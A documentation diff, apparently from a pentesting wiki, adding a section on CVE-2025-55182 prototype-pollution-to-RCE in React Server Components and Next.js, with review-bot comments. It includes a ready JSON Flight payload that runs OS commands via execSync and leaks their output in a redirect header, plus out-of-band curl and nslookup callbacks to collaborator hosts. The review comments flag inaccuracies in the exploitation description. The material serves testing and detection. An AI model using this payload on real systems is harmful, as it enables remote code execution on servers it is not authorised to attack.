Expand Up @@ -747,6 +747,55 @@ Object.prototype.env = {
require("./usage.js")
```

## React Server Components Flight PP2RCE (CVE-2025-55182)

React Server Components (RSC) exchange component trees over the Flight protocol, which is typically transported as `multipart/form-data` where each part contains JSON-like chunks with `$<id>:<path>` references. In React `19.0.0–19.2.0` / Next.js `15.0.4–16.0.6` the server-side resolver lets attackers point those references at magic properties such as `__proto__`, enabling prototype pollution that quickly escalates to arbitrary JavaScript and OS command execution inside the Node.js worker. For enumerating exposed RSC endpoints, see the [NextJS pentesting notes](../../../network-services-pentesting/pentesting-web/nextjs.md).

### Flight exploitation flow

1. **Reach an RSC endpoint** (usually identified by a `Next-Action` header and `react-server-dom-webpack` content-type) and send a crafted multipart POST that Flight will deserialize.
2. **Pollute core prototypes** by assigning references such as `"then": "$1:__proto__:then"`. When the resolver walks that path it writes a controllable `then` into `Object.prototype`, giving the attacker influence over subsequent promise/thenable handling.
3. **Pivot to the global `Function` constructor** by pointing `_response._formData.get` at `"$1:constructor:constructor"`. When the runtime later calls `_formData.get()` it actually runs `Function(<attacker controlled source>)`.
4. **Execute Node primitives via `_response._prefix`**, e.g. `process.mainModule.require('child_process').execSync('COMMAND')`, to spawn OS commands under the Next.js worker account.
5. **Exfiltrate command output** by throwing a `NEXT_REDIRECT` error whose `digest` is `NEXT_REDIRECT;push;/login?a=${res};307;`. Next.js forwards this into the `x-action-redirect` header of the HTTP 303 response, so attackers instantly see their command output.

### Example Flight chunk

```json
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('COMMAND').toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});",
"_chunks": "$Q2",
"_formData": { "get": "$1:constructor:constructor" }
}
}
```

### Safe verification primitives

- **In-band math PoC (Unix-like):** Execute `echo $((31337*31337))` via `execSync`. The result `982013569` must appear inside the `x-action-redirect` header of a `303` response together with the `NEXT_REDIRECT` digest, proving arbitrary command execution without touching the filesystem or network.
- **Windows-safe PoC:** Swap the payload to `powershell -c "31337*31337"`. The same `982013569` sentinel flowing through `x-action-redirect` proves a vulnerable Windows Node.js host.
- **Out-of-band validation:** When WAF/CDN layers strip headers or responses, run a command like `nslookup <token>.burpcollaborator.net` (or `curl https://<token>.oastify.com`) from `_prefix`. Any DNS/HTTP interaction observed by the collaborator confirms exploitation even if the HTTP response is empty.

### Burp Bounty Pro detection profiles

Use **Extensions → Burp Bounty Pro → About → Check For Updates** to pull three purpose-built checks:

- `CVE-2025-55182_React2Shell_RCE` – in-band profile that injects the Unix math command, watches for `303` redirects, and flags hosts only when `x-action-redirect` contains `982013569` to minimize false positives.
- `CVE-2025-55182_React2Shell_RCE_OOB` – identical Flight payload structure but executes a collaborator callback so blind deployments or aggressively sanitized responses still register as RCE via Burp Collaborator events.
- `CVE-2025-55182_React2Shell_RCE_Windows` – reuses the math technique with a PowerShell expression to safely test Windows-based Next.js stacks.

### Operational workflow

1. Run the in-band profile first for fast confirmation; it needs only a single HTTP request.
2. If headers/body are missing or WAF interference is suspected, immediately repeat with the OOB profile and monitor Burp Collaborator.
3. When targeting Windows infrastructure, add the Windows profile to confirm code execution using native tooling.


## VM Gadgets

In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\
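Review bot: Step 2 ("Pollute core prototypes") claims that resolving `"then": "$1:__proto__:then"` writes a controllable `then` into `Object.prototype`, but the example chunk does not show that: the `$1:__proto__:then` reference is a read path, and its result is stored under the `then` key of the attacker-supplied chunk object itself, turning that object into a thenable that carries the attacker's `_response`; nothing in the shown payload assigns to `Object.prototype`. Reword the step to describe what the chunk actually does (the reference walk reaches internal objects and constructors through `__proto__` / `constructor`, which is how `"_formData": { "get": "$1:constructor:constructor" }` ends up on `Function` in step 3), so the section's "prototype pollution" framing matches the payload. Two smaller points: in step 1, `react-server-dom-webpack` is the package that implements the Flight decoder, not a Content-Type value; the intro already says the transport is `multipart/form-data`, so identify the endpoint by the `Next-Action` header and the multipart body. And the `_prefix` payload inserts raw command output into the redirect URL (`/login?a=${res}`); wrap it as `encodeURIComponent(res)` so output containing spaces, `&`, `#` or newlines does not truncate or break the `x-action-redirect` value. The `982013569` sentinel is all digits, so the in-band PoCs pass as written while real commands would silently lose output.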
Expand Down Expand Up @@ -779,6 +828,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
- [https://portswigger.net/research/prototype-pollution-node-no-filesystem](https://portswigger.net/research/prototype-pollution-node-no-filesystem)
- [https://www.nodejs-security.com/blog/2024/prototype-pollution-regression](https://www.nodejs-security.com/blog/2024/prototype-pollution-regression)
- [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
- [CVE-2025-55182 (React2Shell): New Detection Profiles for Burp Bounty Pro](https://bountysecurity.ai/blogs/news/cve-2025-55182-react2shell-new-detection-profiles-for-burp-bounty-pro)

{{#include ../../../banners/hacktricks-training.md}}

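Review bot: The only reference added for the new CVE-2025-55182 section is the Burp Bounty Pro vendor post, while the section states affected version ranges (`19.0.0–19.2.0`, `15.0.4–16.0.6`) and response behaviour that readers will want to check against a primary source; add the upstream React / Next.js security advisory for CVE-2025-55182 to this list and cite it for the version ranges, keeping the vendor post for the detection profiles. Style point: the surrounding entries are bare URLs, whereas the new line is a titled markdown link; match the existing format.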